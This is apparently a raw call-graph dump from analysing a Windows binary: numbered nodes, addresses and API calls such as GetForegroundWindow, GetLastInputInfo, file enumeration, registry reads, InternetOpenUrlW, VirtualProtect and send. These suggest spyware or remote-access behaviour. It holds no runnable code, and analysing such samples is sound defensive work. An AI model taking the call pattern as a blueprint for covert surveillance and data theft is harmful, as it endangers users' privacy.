411e97 _Yarn 54004 4117af 53988->54004 53990 411ec3 53990->53985 54008 411b5f 53990->54008 53994 411efb 53994->53985 53994->53995 54024 1000220c 53994->54024 53995->53915 53996 411f21 53996->53995 53997 411f25 SetLastError 53996->53997 53997->53985 54000 4117a0 SetLastError 53999->54000 54001 4117ab 53999->54001 54000->53966 54001->53966 54002->53975 54003->53988 54005 411885 54004->54005 54007 4117db _Yarn ___scrt_get_show_window_mode 54004->54007 54005->53990 54006 41179c SetLastError 54006->54007 54007->54005 54007->54006 54009 411b80 IsBadReadPtr 54008->54009 54016 411c6a 54008->54016 54010 411b9a 54009->54010 54009->54016 54013 411c82 SetLastError 54010->54013 54014 411c6c SetLastError 54010->54014 54015 411c4f IsBadReadPtr 54010->54015 54010->54016 54031 440f0d 22 API calls 3 library calls 54010->54031 54013->54016 54014->54016 54015->54010 54015->54016 54016->53985 54018 41194f 54016->54018 54022 411975 54018->54022 54019 411a5e 54020 4118b2 VirtualProtect 54019->54020 54021 411a70 54020->54021 54021->53994 54022->54019 54022->54021 54032 4118b2 54022->54032 54025 10002215 54024->54025 54026 1000221a dllmain_dispatch 54024->54026 54036 100022b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 54025->54036 54026->53996 54028->53982 54029->53983 54030->53995 54031->54010 54033 4118c3 54032->54033 54035 4118bb 54032->54035 54034 411936 VirtualProtect 54033->54034 54033->54035 54034->54035 54035->54022 54036->54026 54038 4041c8 54037->54038 54041 4041d9 54038->54041 54040 40419c 54040->53863 54042 4041e9 54041->54042 54043 404206 54042->54043 54044 4041ef 54042->54044 54045 4027e6 28 API calls 54043->54045 54048 404267 54044->54048 54047 404204 54045->54047 54047->54040 54049 402888 22 API calls 54048->54049 54050 40427b 54049->54050 54051 404290 54050->54051 54052 4042a5 54050->54052 54054 4042df 22 API calls 54051->54054 54053 4027e6 28 API calls 54052->54053 54057 4042a3 54053->54057 54055 404299 54054->54055 54056 402c48 22 API calls 54055->54056 54056->54057 54057->54047 54059 441e8d 54058->54059 54062 441c7d 54059->54062 54061 41bbb2 54061->53877 54063 441c94 54062->54063 54065 441ccb __wsopen_s 54063->54065 54066 4405dd 20 API calls _free 54063->54066 54065->54061 54066->54065 54067->53789 54068->53787 54069->53610 54071 4020f6 28 API calls 54070->54071 54072 415b0c SetEvent 54071->54072 54073 415b21 54072->54073 54074 4041a2 28 API calls 54073->54074 54075 415b3b 54074->54075 54076 4020f6 28 API calls 54075->54076 54077 415b4b 54076->54077 54078 4020f6 28 API calls 54077->54078 54079 415b5d 54078->54079 54080 41be1b 28 API calls 54079->54080 54081 415b66 54080->54081 54083 415b86 GetTickCount 54081->54083 54084 415ce5 54081->54084 54146 415cd6 54081->54146 54082 401e8d 11 API calls 54085 417092 54082->54085 54086 41bb8e 28 API calls 54083->54086 54084->54146 54147 415cf9 54084->54147 54087 401fd8 11 API calls 54085->54087 54088 415b97 54086->54088 54090 41709e 54087->54090 54149 41bae6 GetLastInputInfo GetTickCount 54088->54149 54092 401fd8 11 API calls 54090->54092 54094 4170aa 54092->54094 54093 415ba3 54095 41bb8e 28 API calls 54093->54095 54096 415bae 54095->54096 54150 41ba96 54096->54150 54099 41bd1e 28 API calls 54100 415bca 54099->54100 54101 401e65 22 API calls 54100->54101 54102 415bd8 54101->54102 54103 402f31 28 API calls 54102->54103 54104 415be6 54103->54104 54155 402ea1 28 API calls 54104->54155 54106 415bf5 54107 402f10 28 API calls 54106->54107 54108 415c04 54107->54108 54156 402ea1 28 API calls 54108->54156 54110 415c13 54111 402f10 28 API calls 54110->54111 54112 415c1f 54111->54112 54157 402ea1 28 API calls 54112->54157 54114 415c29 54115 404aa1 61 API calls 54114->54115 54116 415c38 54115->54116 54117 401fd8 11 API calls 54116->54117 54118 415c41 54117->54118 54119 401fd8 11 API calls 54118->54119 54120 415c4d 54119->54120 54121 401fd8 11 API calls 54120->54121 54122 415c59 54121->54122 54123 401fd8 11 API calls 54122->54123 54124 415c65 54123->54124 54125 401fd8 11 API calls 54124->54125 54126 415c71 54125->54126 54127 401fd8 11 API calls 54126->54127 54128 415c7d 54127->54128 54129 401f09 11 API calls 54128->54129 54130 415c86 54129->54130 54131 401fd8 11 API calls 54130->54131 54132 415c8f 54131->54132 54133 401fd8 11 API calls 54132->54133 54134 415c98 54133->54134 54135 401e65 22 API calls 54134->54135 54136 415ca3 54135->54136 54158 43baac 54136->54158 54139 415cb5 54142 415cc3 54139->54142 54143 415cce 54139->54143 54140 415cdb 54141 401e65 22 API calls 54140->54141 54141->54084 54162 404ff4 82 API calls 54142->54162 54163 404f51 54143->54163 54146->54082 54178 4050e4 84 API calls 54147->54178 54148 415cc9 54148->54146 54149->54093 54179 436e90 54150->54179 54153 40417e 28 API calls 54154 415bbc 54153->54154 54154->54099 54155->54106 54156->54110 54157->54114 54159 43bac5 _strftime 54158->54159 54181 43ae03 54159->54181 54161 415cb0 54161->54139 54161->54140 54162->54148 54164 404f65 54163->54164 54165 404fea 54163->54165 54166 404f6e 54164->54166 54167 404fc0 CreateEventA CreateThread 54164->54167 54168 404f7d GetLocalTime 54164->54168 54165->54146 54166->54167 54167->54165 54252 405150 54167->54252 54169 41bb8e 28 API calls 54168->54169 54170 404f91 54169->54170 54251 4052fd 28 API calls 54170->54251 54178->54148 54180 41bab5 GetForegroundWindow GetWindowTextW 54179->54180 54180->54153 54197 43ba0a 54181->54197 54183 43ae50 54203 43a7b7 54183->54203 54185 43ae15 54185->54183 54186 43ae2a 54185->54186 54188 43ae2f __wsopen_s 54185->54188 54202 4405dd 20 API calls _free 54186->54202 54188->54161 54190 43ae5c 54191 43ae8b 54190->54191 54211 43ba4f 40 API calls __Toupper 54190->54211 54194 43aef7 54191->54194 54212 43b9b6 20 API calls 2 library calls 54191->54212 54213 43b9b6 20 API calls 2 library calls 54194->54213 54195 43afbe _strftime 54195->54188 54214 4405dd 20 API calls _free 54195->54214 54198 43ba22 54197->54198 54199 43ba0f 54197->54199 54198->54185 54215 4405dd 20 API calls _free 54199->54215 54201 43ba14 __wsopen_s 54201->54185 54202->54188 54204 43a7d4 54203->54204 54205 43a7ca 54203->54205 54204->54205 54216 448215 GetLastError 54204->54216 54205->54190 54207 43a7f5 54237 448364 36 API calls __Toupper 54207->54237 54209 43a80e 54238 448391 36 API calls __fassign 54209->54238 54211->54190 54212->54194 54213->54195 54214->54188 54215->54201 54217 448237 54216->54217 54218 44822b 54216->54218 54240 445af3 20 API calls 3 library calls 54217->54240 54239 4487bc 11 API calls 2 library calls 54218->54239 54221 448231 54221->54217 54223 448280 SetLastError 54221->54223 54222 448243 54224 44824b 54222->54224 54247 448812 11 API calls 2 library calls 54222->54247 54223->54207 54241 446782 54224->54241 54226 448260 54226->54224 54228 448267 54226->54228 54248 448087 20 API calls _free 54228->54248 54229 448251 54231 44828c SetLastError 54229->54231 54249 4460f4 36 API calls 4 library calls 54231->54249 54232 448272 54234 446782 _free 20 API calls 54232->54234 54236 448279 54234->54236 54235 448298 54236->54223 54236->54231 54237->54209 54238->54205 54239->54221 54240->54222 54242 44678d HeapFree 54241->54242 54246 4467b6 _free 54241->54246 54243 4467a2 54242->54243 54242->54246 54250 4405dd 20 API calls _free 54243->54250 54245 4467a8 GetLastError 54245->54246 54246->54229 54247->54226 54248->54232 54249->54235 54250->54245 54255 40515c 102 API calls 54252->54255 54254 405159 54255->54254 54256->53553 54257->53558 54258->53560 54259 445847 54260 445852 54259->54260 54262 44587b 54260->54262 54263 445877 54260->54263 54265 448a84 54260->54265 54272 44589f DeleteCriticalSection 54262->54272 54273 4484ca 54265->54273 54268 448ac9 InitializeCriticalSectionAndSpinCount 54269 448ab4 54268->54269 54280 434fcb 54269->54280 54271 448ae0 54271->54260 54272->54263 54274 4484fa 54273->54274 54277 4484f6 54273->54277 54274->54268 54274->54269 54275 44851a 54275->54274 54278 448526 GetProcAddress 54275->54278 54277->54274 54277->54275 54287 448566 54277->54287 54279 448536 __crt_fast_encode_pointer 54278->54279 54279->54274 54281 434fd6 IsProcessorFeaturePresent 54280->54281 54282 434fd4 54280->54282 54284 435018 54281->54284 54282->54271 54294 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 54284->54294 54286 4350fb 54286->54271 54288 448587 LoadLibraryExW 54287->54288 54292 44857c 54287->54292 54289 4485a4 GetLastError 54288->54289 54293 4485bc 54288->54293 54291 4485af LoadLibraryExW 54289->54291 54289->54293 54290 4485d3 FreeLibrary 54290->54292 54291->54293 54292->54277 54293->54290 54293->54292 54294->54286 54295 434887 54296 434893 ___DestructExceptionObject 54295->54296 54322 434596 54296->54322 54298 43489a 54300 4348c3 54298->54300 54628 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 54298->54628 54304 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54300->54304 54333 444251 54300->54333 54311 434962 54304->54311 54629 4433e7 36 API calls 6 library calls 54304->54629 54305 4348e2 ___DestructExceptionObject 54341 434b14 54311->54341 54323 43459f 54322->54323 54634 434c52 IsProcessorFeaturePresent 54323->54634 54325 4345ab 54635 438f31 54325->54635 54327 4345b0 54332 4345b4 54327->54332 54644 4440bf 54327->54644 54330 4345cb 54330->54298 54332->54298 54334 444268 54333->54334 54335 434fcb ___crtLCMapStringA 5 API calls 54334->54335 54336 4348dc 54335->54336 54336->54305 54337 4441f5 54336->54337 54338 444224 54337->54338 54339 434fcb ___crtLCMapStringA 5 API calls 54338->54339 54340 44424d 54339->54340 54340->54304 54342 436e90 ___scrt_get_show_window_mode 54341->54342 54343 434b27 GetStartupInfoW 54342->54343 54344 434968 54343->54344 54345 4441a2 54344->54345 54694 44f059 54345->54694 54347 4441ab 54348 434971 54347->54348 54698 446815 36 API calls 54347->54698 54350 40e9c5 54348->54350 54828 41cb50 LoadLibraryA GetProcAddress 54350->54828 54352 40e9e1 GetModuleFileNameW 54833 40f3c3 54352->54833 54354 40e9fd 54355 4020f6 28 API calls 54354->54355 54356 40ea0c 54355->54356 54357 4020f6 28 API calls 54356->54357 54358 40ea1b 54357->54358 54359 41be1b 28 API calls 54358->54359 54360 40ea24 54359->54360 54848 40fb17 54360->54848 54362 40ea2d 54363 401e8d 11 API calls 54362->54363 54364 40ea36 54363->54364 54365 40ea93 54364->54365 54366 40ea49 54364->54366 54367 401e65 22 API calls 54365->54367 55043 40fbb3 118 API calls 54366->55043 54369 40eaa3 54367->54369 54373 401e65 22 API calls 54369->54373 54370 40ea5b 54371 401e65 22 API calls 54370->54371 54372 40ea67 54371->54372 55044 410f37 36 API calls __EH_prolog 54372->55044 54374 40eac2 54373->54374 54375 40531e 28 API calls 54374->54375 54377 40ead1 54375->54377 54379 406383 28 API calls 54377->54379 54378 40ea79 55045 40fb64 78 API calls 54378->55045 54381 40eadd 54379->54381 54383 401fe2 28 API calls 54381->54383 54382 40ea82 55046 40f3b0 71 API calls 54382->55046 54385 40eae9 54383->54385 54386 401fd8 11 API calls 54385->54386 54387 40eaf2 54386->54387 54389 401fd8 11 API calls 54387->54389 54391 40eafb 54389->54391 54392 401e65 22 API calls 54391->54392 54393 40eb04 54392->54393 54394 401fc0 28 API calls 54393->54394 54395 40eb0f 54394->54395 54396 401e65 22 API calls 54395->54396 54397 40eb28 54396->54397 54398 401e65 22 API calls 54397->54398 54399 40eb43 54398->54399 54400 40ebae 54399->54400 55047 406c1e 54399->55047 54401 401e65 22 API calls 54400->54401 54407 40ebbb 54401->54407 54403 40eb70 54404 401fe2 28 API calls 54403->54404 54405 40eb7c 54404->54405 54408 401fd8 11 API calls 54405->54408 54406 40ec02 54852 40d069 54406->54852 54407->54406 54413 413549 3 API calls 54407->54413 54410 40eb85 54408->54410 55052 413549 RegOpenKeyExA 54410->55052 54419 40ebe6 54413->54419 54417 40f34f 55145 4139a9 30 API calls 54417->55145 54419->54406 55055 4139a9 30 API calls 54419->55055 54427 40f365 55146 412475 65 API calls ___scrt_get_show_window_mode 54427->55146 54628->54298 54629->54311 54634->54325 54636 438f36 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54635->54636 54648 43a43a 54636->54648 54640 438f4c 54641 438f57 54640->54641 54662 43a476 DeleteCriticalSection 54640->54662 54641->54327 54643 438f44 54643->54327 54690 44fb68 54644->54690 54647 438f5a 8 API calls 3 library calls 54647->54332 54649 43a443 54648->54649 54651 43a46c 54649->54651 54652 438f40 54649->54652 54663 438e7f 54649->54663 54668 43a476 DeleteCriticalSection 54651->54668 54652->54643 54654 43a3ec 54652->54654 54683 438d94 54654->54683 54656 43a3f6 54657 43a401 54656->54657 54688 438e42 6 API calls try_get_function 54656->54688 54657->54640 54659 43a40f 54660 43a41c 54659->54660 54689 43a41f 6 API calls ___vcrt_FlsFree 54659->54689 54660->54640 54662->54643 54669 438c73 54663->54669 54666 438eb6 InitializeCriticalSectionAndSpinCount 54667 438ea2 54666->54667 54667->54649 54668->54652 54670 438ca3 54669->54670 54671 438ca7 54669->54671 54670->54671 54675 438cc7 54670->54675 54676 438d13 54670->54676 54671->54666 54671->54667 54673 438cd3 GetProcAddress 54674 438ce3 __crt_fast_encode_pointer 54673->54674 54674->54671 54675->54671 54675->54673 54677 438d3b LoadLibraryExW 54676->54677 54678 438d30 54676->54678 54679 438d57 GetLastError 54677->54679 54680 438d6f 54677->54680 54678->54670 54679->54680 54681 438d62 LoadLibraryExW 54679->54681 54680->54678 54682 438d86 FreeLibrary 54680->54682 54681->54680 54682->54678 54684 438c73 try_get_function 5 API calls 54683->54684 54685 438dae 54684->54685 54686 438dc6 TlsAlloc 54685->54686 54687 438db7 54685->54687 54687->54656 54688->54659 54689->54657 54693 44fb81 54690->54693 54691 434fcb ___crtLCMapStringA 5 API calls 54692 4345bd 54691->54692 54692->54330 54692->54647 54693->54691 54695 44f06b 54694->54695 54696 44f062 54694->54696 54695->54347 54699 44ef58 54696->54699 54698->54347 54700 448215 __Toupper 36 API calls 54699->54700 54701 44ef65 54700->54701 54719 44f077 54701->54719 54703 44ef6d 54728 44ecec 54703->54728 54706 44ef84 54706->54695 54709 44efc7 54712 446782 _free 20 API calls 54709->54712 54712->54706 54713 44efc2 54752 4405dd 20 API calls _free 54713->54752 54715 44f00b 54715->54709 54753 44ebc2 20 API calls 54715->54753 54716 44efdf 54716->54715 54717 446782 _free 20 API calls 54716->54717 54717->54715 54720 44f083 ___DestructExceptionObject 54719->54720 54721 448215 __Toupper 36 API calls 54720->54721 54722 44f08d 54721->54722 54726 44f111 ___DestructExceptionObject 54722->54726 54727 446782 _free 20 API calls 54722->54727 54754 4460f4 36 API calls 4 library calls 54722->54754 54755 445888 EnterCriticalSection 54722->54755 54756 44f108 LeaveCriticalSection std::_Lockit::~_Lockit 54722->54756 54726->54703 54727->54722 54729 43a7b7 __fassign 36 API calls 54728->54729 54730 44ecfe 54729->54730 54731 44ed0d GetOEMCP 54730->54731 54732 44ed1f 54730->54732 54733 44ed36 54731->54733 54732->54733 54734 44ed24 GetACP 54732->54734 54733->54706 54735 446137 54733->54735 54734->54733 54736 446175 54735->54736 54740 446145 ___crtLCMapStringA 54735->54740 54758 4405dd 20 API calls _free 54736->54758 54738 446160 RtlAllocateHeap 54739 446173 54738->54739 54738->54740 54739->54709 54742 44f119 54739->54742 54740->54736 54740->54738 54757 442f80 7 API calls 2 library calls 54740->54757 54743 44ecec 38 API calls 54742->54743 54744 44f138 54743->54744 54745 44f13f 54744->54745 54748 44f189 IsValidCodePage 54744->54748 54751 44f1ae ___scrt_get_show_window_mode 54744->54751 54746 434fcb ___crtLCMapStringA 5 API calls 54745->54746 54747 44efba 54746->54747 54747->54713 54747->54716 54748->54745 54749 44f19b GetCPInfo 54748->54749 54749->54745 54749->54751 54759 44edc4 GetCPInfo 54751->54759 54752->54709 54753->54709 54754->54722 54755->54722 54756->54722 54757->54740 54758->54739 54765 44edfe 54759->54765 54768 44eea8 54759->54768 54762 434fcb ___crtLCMapStringA 5 API calls 54764 44ef54 54762->54764 54764->54745 54769 45112c 54765->54769 54767 44ae66 _swprintf 41 API calls 54767->54768 54768->54762 54770 43a7b7 __fassign 36 API calls 54769->54770 54771 45114c MultiByteToWideChar 54770->54771 54773 45118a 54771->54773 54781 451222 54771->54781 54777 446137 ___crtLCMapStringA 21 API calls 54773->54777 54778 4511ab __alloca_probe_16 ___scrt_get_show_window_mode 54773->54778 54774 434fcb ___crtLCMapStringA 5 API calls 54775 44ee5f 54774->54775 54783 44ae66 54775->54783 54776 45121c 54788 435e40 20 API calls _free 54776->54788 54777->54778 54778->54776 54780 4511f0 MultiByteToWideChar 54778->54780 54780->54776 54782 45120c GetStringTypeW 54780->54782 54781->54774 54782->54776 54784 43a7b7 __fassign 36 API calls 54783->54784 54785 44ae79 54784->54785 54789 44ac49 54785->54789 54788->54781 54790 44ac64 ___crtLCMapStringA 54789->54790 54791 44ac8a MultiByteToWideChar 54790->54791 54792 44acb4 54791->54792 54803 44ae3e 54791->54803 54795 446137 ___crtLCMapStringA 21 API calls 54792->54795 54799 44acd5 __alloca_probe_16 54792->54799 54793 434fcb ___crtLCMapStringA 5 API calls 54794 44ae51 54793->54794 54794->54767 54795->54799 54796 44ad1e MultiByteToWideChar 54797 44ad37 54796->54797 54798 44ad8a 54796->54798 54816 448bb3 54797->54816 54825 435e40 20 API calls _free 54798->54825 54799->54796 54799->54798 54803->54793 54804 44ad61 54804->54798 54806 448bb3 _strftime 11 API calls 54804->54806 54805 44ad99 54808 446137 ___crtLCMapStringA 21 API calls 54805->54808 54811 44adba __alloca_probe_16 54805->54811 54806->54798 54807 44ae2f 54824 435e40 20 API calls _free 54807->54824 54808->54811 54809 448bb3 _strftime 11 API calls 54812 44ae0e 54809->54812 54811->54807 54811->54809 54812->54807 54813 44ae1d WideCharToMultiByte 54812->54813 54813->54807 54814 44ae5d 54813->54814 54826 435e40 20 API calls _free 54814->54826 54817 4484ca _free 5 API calls 54816->54817 54818 448bda 54817->54818 54820 448be3 54818->54820 54827 448c3b 10 API calls 3 library calls 54818->54827 54822 434fcb ___crtLCMapStringA 5 API calls 54820->54822 54821 448c23 LCMapStringW 54821->54820 54823 448c35 54822->54823 54823->54798 54823->54804 54823->54805 54824->54798 54825->54803 54826->54798 54827->54821 54829 41cb8f LoadLibraryA GetProcAddress 54828->54829 54830 41cb7f GetModuleHandleA GetProcAddress 54828->54830 54831 41cbb8 44 API calls 54829->54831 54832 41cba8 LoadLibraryA GetProcAddress 54829->54832 54830->54829 54831->54352 54832->54831 55147 41b4a8 FindResourceA 54833->55147 54836 43bd51 _Yarn 21 API calls 54837 40f3ed _Yarn 54836->54837 54838 4020b7 28 API calls 54837->54838 54839 40f408 54838->54839 54840 401fe2 28 API calls 54839->54840 54841 40f413 54840->54841 54842 401fd8 11 API calls 54841->54842 54843 40f41c 54842->54843 54844 43bd51 _Yarn 21 API calls 54843->54844 54845 40f42d _Yarn 54844->54845 55150 406dd8 54845->55150 54847 40f460 54847->54354 54849 40fb23 54848->54849 54851 40fb2a 54848->54851 55153 402163 11 API calls 54849->55153 54851->54362 55154 401fab 54852->55154 55043->54370 55044->54378 55045->54382 55048 4020df 11 API calls 55047->55048 55049 406c2a 55048->55049 55050 4032a0 28 API calls 55049->55050 55051 406c47 55050->55051 55051->54403 55053 40eba4 55052->55053 55054 413573 RegQueryValueExA RegCloseKey 55052->55054 55053->54400 55053->54417 55054->55053 55055->54406 55145->54427 55148 41b4c5 LoadResource LockResource SizeofResource 55147->55148 55149 40f3de 55147->55149 55148->55149 55149->54836 55151 4020b7 28 API calls 55150->55151 55152 406dec 55151->55152 55152->54847 55153->54851 55507 4269e6 55508 4269fb 55507->55508 55514 426a8d 55507->55514 55509 426a48 55508->55509 55510 426b44 55508->55510 55511 426abd 55508->55511 55512 426b1d 55508->55512 55508->55514 55518 426af2 55508->55518 55521 426a7d 55508->55521 55535 424edd 49 API calls _Yarn 55508->55535 55509->55514 55509->55521 55536 41fb6c 52 API calls 55509->55536 55510->55514 55540 426155 28 API calls 55510->55540 55511->55514 55511->55518 55538 41fb6c 52 API calls 55511->55538 55512->55510 55512->55514 55523 425ae1 55512->55523 55518->55512 55539 4256f0 21 API calls 55518->55539 55521->55511 55521->55514 55537 424edd 49 API calls _Yarn 55521->55537 55524 425b00 ___scrt_get_show_window_mode 55523->55524 55527 425b0f 55524->55527 55532 425b34 55524->55532 55541 41ebbb 21 API calls 55524->55541 55525 425b14 55531 425b1d 55525->55531 55525->55532 55548 41da5f 49 API calls 55525->55548 55527->55525 55527->55532 55542 4205d8 46 API calls 55527->55542 55530 425bb7 55530->55532 55543 432ec4 55530->55543 55531->55532 55549 424d05 21 API calls 2 library calls 55531->55549 55532->55510 55535->55509 55536->55509 55537->55511 55538->55511 55539->55512 55540->55514 55541->55527 55542->55530 55544 432ed2 55543->55544 55545 432ece 55543->55545 55546 43bd51 _Yarn 21 API calls 55544->55546 55545->55525 55547 432ed7 55546->55547 55547->55525 55548->55531 55549->55532 55550 415d06 55565 41b380 55550->55565 55552 415d0f 55553 4020f6 28 API calls 55552->55553 55554 415d1e 55553->55554 55555 404aa1 61 API calls 55554->55555 55556 415d2a 55555->55556 55557 417089 55556->55557 55558 401fd8 11 API calls 55556->55558 55559 401e8d 11 API calls 55557->55559 55558->55557 55560 417092 55559->55560 55561 401fd8 11 API calls 55560->55561 55562 41709e 55561->55562 55563 401fd8 11 API calls 55562->55563 55564 4170aa 55563->55564 55566 4020df 11 API calls 55565->55566 55567 41b38e 55566->55567 55568 43bd51 _Yarn 21 API calls 55567->55568 55569 41b39e InternetOpenW InternetOpenUrlW 55568->55569 55570 41b3c5 InternetReadFile 55569->55570 55574 41b3e8 55570->55574 55571 41b415 InternetCloseHandle InternetCloseHandle 55573 41b427 55571->55573 55572 4020b7 28 API calls 55572->55574 55573->55552 55574->55570 55574->55571 55574->55572 55575 401fd8 11 API calls 55574->55575 55575->55574 55576 1000c7a7 55577 1000c7be 55576->55577 55582 1000c82c 55576->55582 55577->55582 55586 1000c7e6 GetModuleHandleA 55577->55586 55579 1000c872 55580 1000c835 GetModuleHandleA 55581 1000c83f 55580->55581 55581->55581 55581->55582 55582->55579 55582->55580 55587 1000c7ef 55586->55587 55593 1000c82c 55586->55593 55596 1000c803 55587->55596 55589 1000c872 55590 1000c835 GetModuleHandleA 55591 1000c83f 55590->55591 55591->55591 55591->55593 55593->55589 55593->55590 55597 1000c809 55596->55597 55598 1000c80d VirtualProtect 55597->55598 55600 1000c82c 55597->55600 55599 1000c81c VirtualProtect 55598->55599 55598->55600 55599->55600 55601 1000c872 55600->55601 55602 1000c835 GetModuleHandleA 55600->55602 55603 1000c83f 55602->55603 55603->55600 55604 426c4b 55609 426cc8 send 55604->55609 55610 416f0d 55635 4063be 55610->55635 55613 401e65 22 API calls 55614 416f21 55613->55614 55615 401e65 22 API calls 55614->55615 55616 416f2e 55615->55616 55636 4020df 11 API calls 55635->55636 55637 4063d6 55636->55637 55638 4020df 11 API calls 55637->55638 55639 4063e2 55638->55639 55640 4020df 11 API calls 55639->55640 55641 4063ee 55640->55641 55642 4020df 11 API calls 55641->55642 55643 4063fa 55642->55643 55644 4020df 11 API calls 55643->55644 55645 406403 55644->55645 55646 4020df 11 API calls 55645->55646 55647 40640f 55646->55647 55648 4020df 11 API calls 55647->55648 55649 40641b 55648->55649 55650 4020df 11 API calls 55649->55650 55651 406424 55650->55651 55805 40c34d 55651->55805 55665 406472 55941 41c485 CreateFileW 55665->55941 55667 40648c 55668 41c485 32 API calls 55667->55668 55669 4064a6 55668->55669 55670 401e65 22 API calls 55669->55670 55672 406546 55669->55672 55676 41c485 32 API calls 55669->55676 55681 406c1e 28 API calls 55669->55681 55689 401fe2 28 API calls 55669->55689 55693 401fd8 11 API calls 55669->55693 55986 4132a4 40 API calls 55669->55986 55670->55669 55671 4065a2 55949 4068e8 55671->55949 55672->55671 55674 401e65 22 API calls 55672->55674 55680 41c485 32 API calls 55672->55680 55684 406c1e 28 API calls 55672->55684 55691 401fd8 11 API calls 55672->55691 55674->55672 55676->55669 55679 401fe2 28 API calls 55682 4065ca 55679->55682 55680->55672 55681->55669 55683 401fd8 11 API calls 55682->55683 55685 4065d3 55683->55685 55684->55672 55687 401fd8 11 API calls 55685->55687 55688 4065dc 55687->55688 55690 4068e8 32 API calls 55688->55690 55689->55669 55692 4065ec 55690->55692 55691->55672 55694 406991 31 API calls 55692->55694 55693->55669 55695 4065f7 55694->55695 55696 401fe2 28 API calls 55695->55696 55697 406604 55696->55697 55698 401fd8 11 API calls 55697->55698 55699 40660d 55698->55699 55700 401fd8 11 API calls 55699->55700 55701 406616 55700->55701 55702 4068e8 32 API calls 55701->55702 55703 406626 55702->55703 55704 406991 31 API calls 55703->55704 55705 406631 55704->55705 55706 401fe2 28 API calls 55705->55706 55707 40663b 55706->55707 55708 401fd8 11 API calls 55707->55708 55709 406644 55708->55709 55710 401fd8 11 API calls 55709->55710 55711 40664d 55710->55711 55712 402f31 28 API calls 55711->55712 55713 406698 55712->55713 55714 402f10 28 API calls 55713->55714 55715 4066a7 55714->55715 55716 402f10 28 API calls 55715->55716 55717 4066b6 55716->55717 55718 402f10 28 API calls 55717->55718 55719 4066c5 55718->55719 55720 402f10 28 API calls 55719->55720 55721 4066d4 55720->55721 55722 402f10 28 API calls 55721->55722 55723 4066e3 55722->55723 55724 402f10 28 API calls 55723->55724 55725 4066f2 55724->55725 55726 402f10 28 API calls 55725->55726 55727 406701 55726->55727 55728 402f10 28 API calls 55727->55728 55729 406710 55728->55729 55730 402f10 28 API calls 55729->55730 55731 40671c 55730->55731 55732 402f10 28 API calls 55731->55732 55733 406728 55732->55733 55734 402f10 28 API calls 55733->55734 55735 406732 55734->55735 55736 401fd8 11 API calls 55735->55736 55737 40673c 55736->55737 55738 401fd8 11 API calls 55737->55738 55739 406745 55738->55739 55740 401fd8 11 API calls 55739->55740 55741 406751 55740->55741 55742 401fd8 11 API calls 55741->55742 55743 40675d 55742->55743 55744 401fd8 11 API calls 55743->55744 55745 406769 55744->55745 55746 401fd8 11 API calls 55745->55746 55747 406775 55746->55747 55748 401fd8 11 API calls 55747->55748 55749 406781 55748->55749 55750 401fd8 11 API calls 55749->55750 55751 40678d 55750->55751 55752 401fd8 11 API calls 55751->55752 55753 406799 55752->55753 55754 401fd8 11 API calls 55753->55754 55755 4067a5 55754->55755 55756 401fd8 11 API calls 55755->55756 55757 4067b1 55756->55757 55758 401f09 11 API calls 55757->55758 55759 4067bd 55758->55759 55760 401f09 11 API calls 55759->55760 55761 4067c9 55760->55761 55762 401f09 11 API calls 55761->55762 55763 4067d5 55762->55763 55764 401f09 11 API calls 55763->55764 55765 4067e1 55764->55765 55980 406adc 55765->55980 55768 406adc 11 API calls 55769 4067f3 55768->55769 55770 401f09 11 API calls 55769->55770 55771 4067ff 55770->55771 55772 401fd8 11 API calls 55771->55772 55773 406808 55772->55773 55774 401fd8 11 API calls 55773->55774 55775 406814 55774->55775 55776 401fd8 11 API calls 55775->55776 55777 406820 55776->55777 55778 401fd8 11 API calls 55777->55778 55779 406829 55778->55779 55780 401fd8 11 API calls 55779->55780 55781 406835 55780->55781 55782 401fd8 11 API calls 55781->55782 55783 406841 55782->55783 55784 401fd8 11 API calls 55783->55784 55785 40684d 55784->55785 55786 401fd8 11 API calls 55785->55786 55787 406859 55786->55787 55787->55613 55806 40c364 55805->55806 55807 40417e 28 API calls 55806->55807 55808 40c36e 55807->55808 55809 40915b 28 API calls 55808->55809 55810 40c392 55809->55810 55811 40c39a FindFirstFileW 55810->55811 55812 401f09 11 API calls 55811->55812 55813 40c3ab 55812->55813 55814 40c3b0 55813->55814 55815 40c3c1 55813->55815 55816 40417e 28 API calls 55814->55816 55817 4020df 11 API calls 55815->55817 55818 40c3bc 55816->55818 55819 40c3c9 55817->55819 55821 401f09 11 API calls 55818->55821 55820 40c466 FindNextFileW 55819->55820 55827 40417e 28 API calls 55819->55827 55828 40915b 28 API calls 55819->55828 55829 402fa5 28 API calls 55819->55829 55830 401f09 11 API calls 55819->55830 55831 40c453 PathFileExistsW 55819->55831 55834 401f09 11 API calls 55819->55834 55820->55819 55822 40c47c FindClose 55820->55822 55823 406430 55821->55823 55824 40417e 28 API calls 55822->55824 55837 40c5ec 55823->55837 55825 40c48f 55824->55825 55826 401fd8 11 API calls 55825->55826 55826->55818 55827->55819 55828->55819 55829->55819 55830->55819 55831->55819 55832 40c4a7 FindClose 55831->55832 55833 403262 11 API calls 55832->55833 55835 40c4b9 55833->55835 55834->55820 55836 401f09 11 API calls 55835->55836 55836->55825 55838 40c5fb 55837->55838 55987 40c4c3 55838->55987 55841 40915b 28 API calls 55842 40c613 55841->55842 55843 40c61c PathFileExistsW 55842->55843 55844 40c627 55843->55844 55851 40c632 55843->55851 56008 40c916 28 API calls 55844->56008 55846 40915b 28 API calls 55846->55851 55847 401f13 28 API calls 55847->55851 55848 401f09 11 API calls 55848->55851 55851->55846 55851->55847 55851->55848 55852 40c687 PathFileExistsW 55851->55852 55854 40c6a3 55851->55854 55999 41bc07 55851->55999 56005 40c9bf 55851->56005 56009 40c916 28 API calls 55851->56009 55852->55851 55855 401f09 11 API calls 55854->55855 55856 40c6ab 55855->55856 55857 401f09 11 API calls 55856->55857 55858 406439 55857->55858 55859 40c6bb 55858->55859 55860 40c6ca 55859->55860 56031 40c526 55860->56031 55863 40915b 28 API calls 55864 40c6e2 55863->55864 55865 40c6eb PathFileExistsW 55864->55865 55866 40c6f6 55865->55866 55869 40c701 55865->55869 56043 40c916 28 API calls 55866->56043 55868 40915b 28 API calls 55868->55869 